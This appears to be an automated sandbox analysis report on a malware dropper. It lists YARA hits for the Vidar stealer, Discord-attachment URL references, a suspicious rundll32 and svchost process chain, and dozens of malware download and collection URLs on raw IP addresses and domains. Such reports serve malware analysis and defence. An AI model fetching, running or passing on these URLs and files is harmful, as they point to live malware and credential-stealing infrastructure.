19.3.arnatic_5.exe.646a8c0.65.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xbdfe8:$x1: https://cdn.discordapp.com/attachments/ 0xbe168:$x1: https://cdn.discordapp.com/attachments/ 0xbe228:$x1: https://cdn.discordapp.com/attachments/ 0xbe2e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe528:$x1: https://cdn.discordapp.com/attachments/ 0xbe5e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe6a8:$x1: https://cdn.discordapp.com/attachments/ 0xbe768:$x1: https://cdn.discordapp.com/attachments/ 0xbe828:$x1: https://cdn.discordapp.com/attachments/ 0xbe9a8:$x1: https://cdn.discordapp.com/attachments/ 0xbea68:$x1: https://cdn.discordapp.com/attachments/ 0xbeb28:$x1: https://cdn.discordapp.com/attachments/ 0xbeca8:$x1: https://cdn.discordapp.com/attachments/ 0xbed68:$x1: https://cdn.discordapp.com/attachments/ 0xbee28:$x1: https://cdn.discordapp.com/attachments/ 0xbeee8:$x1: https://cdn.discordapp.com/attachments/ 0xbefa8:$x1: https://cdn.discordapp.com/attachments/ 0xbf068:$x1: https://cdn.discordapp.com/attachments/ 0xbf128:$x1: https://cdn.discordapp.com/attachments/ 0xbf1e8:$x1: https://cdn.discordapp.com/attachments/ 0xbf368:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.92.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.646a8c0.25.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xbdfe8:$x1: https://cdn.discordapp.com/attachments/ 0xbe168:$x1: https://cdn.discordapp.com/attachments/ 0xbe228:$x1: https://cdn.discordapp.com/attachments/ 0xbe2e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe528:$x1: https://cdn.discordapp.com/attachments/ 0xbe5e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe6a8:$x1: https://cdn.discordapp.com/attachments/ 0xbe768:$x1: https://cdn.discordapp.com/attachments/ 0xbe828:$x1: https://cdn.discordapp.com/attachments/ 0xbe9a8:$x1: https://cdn.discordapp.com/attachments/ 0xbea68:$x1: https://cdn.discordapp.com/attachments/ 0xbeb28:$x1: https://cdn.discordapp.com/attachments/ 0xbeca8:$x1: https://cdn.discordapp.com/attachments/ 0xbed68:$x1: https://cdn.discordapp.com/attachments/ 0xbee28:$x1: https://cdn.discordapp.com/attachments/ 0xbeee8:$x1: https://cdn.discordapp.com/attachments/ 0xbefa8:$x1: https://cdn.discordapp.com/attachments/ 0xbf068:$x1: https://cdn.discordapp.com/attachments/ 0xbf128:$x1: https://cdn.discordapp.com/attachments/ 0xbf1e8:$x1: https://cdn.discordapp.com/attachments/ 0xbf368:$x1: https://cdn.discordapp.com/attachments/
15.0.arnatic_3.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.646a8c0.72.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xbdfe8:$x1: https://cdn.discordapp.com/attachments/ 0xbe168:$x1: https://cdn.discordapp.com/attachments/ 0xbe228:$x1: https://cdn.discordapp.com/attachments/ 0xbe2e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe528:$x1: https://cdn.discordapp.com/attachments/ 0xbe5e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe6a8:$x1: https://cdn.discordapp.com/attachments/ 0xbe768:$x1: https://cdn.discordapp.com/attachments/ 0xbe828:$x1: https://cdn.discordapp.com/attachments/ 0xbe9a8:$x1: https://cdn.discordapp.com/attachments/ 0xbea68:$x1: https://cdn.discordapp.com/attachments/ 0xbeb28:$x1: https://cdn.discordapp.com/attachments/ 0xbeca8:$x1: https://cdn.discordapp.com/attachments/ 0xbed68:$x1: https://cdn.discordapp.com/attachments/ 0xbee28:$x1: https://cdn.discordapp.com/attachments/ 0xbeee8:$x1: https://cdn.discordapp.com/attachments/ 0xbefa8:$x1: https://cdn.discordapp.com/attachments/ 0xbf068:$x1: https://cdn.discordapp.com/attachments/ 0xbf128:$x1: https://cdn.discordapp.com/attachments/ 0xbf1e8:$x1: https://cdn.discordapp.com/attachments/ 0xbf368:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.86.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.646a8c0.55.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xbdfe8:$x1: https://cdn.discordapp.com/attachments/ 0xbe168:$x1: https://cdn.discordapp.com/attachments/ 0xbe228:$x1: https://cdn.discordapp.com/attachments/ 0xbe2e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe528:$x1: https://cdn.discordapp.com/attachments/ 0xbe5e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe6a8:$x1: https://cdn.discordapp.com/attachments/ 0xbe768:$x1: https://cdn.discordapp.com/attachments/ 0xbe828:$x1: https://cdn.discordapp.com/attachments/ 0xbe9a8:$x1: https://cdn.discordapp.com/attachments/ 0xbea68:$x1: https://cdn.discordapp.com/attachments/ 0xbeb28:$x1: https://cdn.discordapp.com/attachments/ 0xbeca8:$x1: https://cdn.discordapp.com/attachments/ 0xbed68:$x1: https://cdn.discordapp.com/attachments/ 0xbee28:$x1: https://cdn.discordapp.com/attachments/ 0xbeee8:$x1: https://cdn.discordapp.com/attachments/ 0xbefa8:$x1: https://cdn.discordapp.com/attachments/ 0xbf068:$x1: https://cdn.discordapp.com/attachments/ 0xbf128:$x1: https://cdn.discordapp.com/attachments/ 0xbf1e8:$x1: https://cdn.discordapp.com/attachments/ 0xbf368:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.90.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f8fd2c.80.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x18144:$x1: https://cdn.discordapp.com/attachments/ 0x18ffc:$x1: https://cdn.discordapp.com/attachments/ 0x1c5d4:$x1: https://cdn.discordapp.com/attachments/ 0x1cbec:$x1: https://cdn.discordapp.com/attachments/ 0x1cc54:$x1: https://cdn.discordapp.com/attachments/ 0x1ccbc:$x1: https://cdn.discordapp.com/attachments/ 0x1ce5c:$x1: https://cdn.discordapp.com/attachments/ 0x1cec4:$x1: https://cdn.discordapp.com/attachments/ 0x1d2d4:$x1: https://cdn.discordapp.com/attachments/
15.0.arnatic_3.exe.23e0e50.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.3f90944.30.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x17f2c:$x1: https://cdn.discordapp.com/attachments/ 0x18de4:$x1: https://cdn.discordapp.com/attachments/ 0x1c3bc:$x1: https://cdn.discordapp.com/attachments/ 0x1c9d4:$x1: https://cdn.discordapp.com/attachments/ 0x1ca3c:$x1: https://cdn.discordapp.com/attachments/ 0x1caa4:$x1: https://cdn.discordapp.com/attachments/ 0x1cc44:$x1: https://cdn.discordapp.com/attachments/ 0x1ccac:$x1: https://cdn.discordapp.com/attachments/ 0x1d0bc:$x1: https://cdn.discordapp.com/attachments/
15.0.arnatic_3.exe.23e0e50.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.2.arnatic_3.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.2.arnatic_3.exe.23e0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.64748d0.95.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.91.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.646a8c0.45.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xbdfe8:$x1: https://cdn.discordapp.com/attachments/ 0xbe168:$x1: https://cdn.discordapp.com/attachments/ 0xbe228:$x1: https://cdn.discordapp.com/attachments/ 0xbe2e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe528:$x1: https://cdn.discordapp.com/attachments/ 0xbe5e8:$x1: https://cdn.discordapp.com/attachments/ 0xbe6a8:$x1: https://cdn.discordapp.com/attachments/ 0xbe768:$x1: https://cdn.discordapp.com/attachments/ 0xbe828:$x1: https://cdn.discordapp.com/attachments/ 0xbe9a8:$x1: https://cdn.discordapp.com/attachments/ 0xbea68:$x1: https://cdn.discordapp.com/attachments/ 0xbeb28:$x1: https://cdn.discordapp.com/attachments/ 0xbeca8:$x1: https://cdn.discordapp.com/attachments/ 0xbed68:$x1: https://cdn.discordapp.com/attachments/ 0xbee28:$x1: https://cdn.discordapp.com/attachments/ 0xbeee8:$x1: https://cdn.discordapp.com/attachments/ 0xbefa8:$x1: https://cdn.discordapp.com/attachments/ 0xbf068:$x1: https://cdn.discordapp.com/attachments/ 0xbf128:$x1: https://cdn.discordapp.com/attachments/ 0xbf1e8:$x1: https://cdn.discordapp.com/attachments/ 0xbf368:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.94.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
15.0.arnatic_3.exe.400000.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.0.arnatic_3.exe.23e0e50.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.64748d0.88.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.87.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.89.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
Click to see the 37 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4140, ProcessCommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 2968

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara Genericmalware

Show sources

Source: Yara match	File source: C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, type: DROPPED

Antivirus detection for URL or domain

Show sources

Source: http://45.144.225.57/EU/searchEUunlim.exe	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file3.exemf	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file3.exeme	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file1.exeC:	Avira URL Cloud: Label: malware
Source: http://xmtbsj.com/setup.exe	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file8.exeC:	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/search_target1kpd.exe/sfx_123_310.exe8	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file8.exe%d3	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/search_target1kpd.exemp	Avira URL Cloud: Label: malware
Source: https://iplis.ru:443/1G8Fx7.mp3tData.phpr	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file8.exe	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/sfx_123_310.exeKd	Avira URL Cloud: Label: malware
Source: http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exe	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file1.exeL	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file10.exe1d/	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file3.exet	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/search_target1kpd.exevw9	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file1.exe	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/EU/searchEUunlim.exem	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file8.exeL	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file8.exeM	Avira URL Cloud: Label: malware
Source: http://2.56.59.42:80/base/api/getData.php	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file7.exeC:	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file3.exen	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/search_target1kpd.exe	Avira URL Cloud: Label: malware
Source: http://2.56.59.42/base/api/getData.php	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file2.exe0.exeQd	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/EU/searchEUunlim.exeC:	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/search_target1kpd.exean	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file9.exemZ	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file9.exe0	Avira URL Cloud: Label: malware
Source: https://iplis.ru/	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file9.exe	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file2.exeC:	Avira URL Cloud: Label: malware
Source: http://212.193.30.29/WW/file4.exe	Avira URL Cloud: Label: malware
Source: http://45.144.225.57/WW/sfx_123_310.exeW	Avira URL Cloud: Label: malware
Source: http://212.193.30.45/WW/file9.exeF	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1144918
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\HR[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1142105
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	Avira: detection malicious, Label: HEUR/AGEN.1144344
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr943210[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1144918
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\searchEUunlim[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.lssyq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	Avira: detection malicious, Label: TR/Redcap.loame
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.txt	Avira: detection malicious, Label: HEUR/AGEN.1144071
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.txt	Avira: detection malicious, Label: TR/Dldr.Agent.ahsja
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	Avira: detection malicious, Label: HEUR/AGEN.1142187
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\search_target1kpd[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.zmiqj
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.txt	Avira: detection malicious, Label: HEUR/AGEN.1144344
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.txt	Avira: detection malicious, Label: HEUR/AGEN.1202313
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	Avira: detection malicious, Label: HEUR/AGEN.1144344
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	Avira: detection malicious, Label: TR/Agent.grsnc

Multi AV Scanner detection for submitted file

Show sources

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Virustotal: Detection: 64%			Perma Link
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	ReversingLabs: Detection: 69%

Antivirus / Scanner detection for submitted sample

Show sources

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Avira: detected

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	Metadefender: Detection: 22%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	ReversingLabs: Detection: 38%
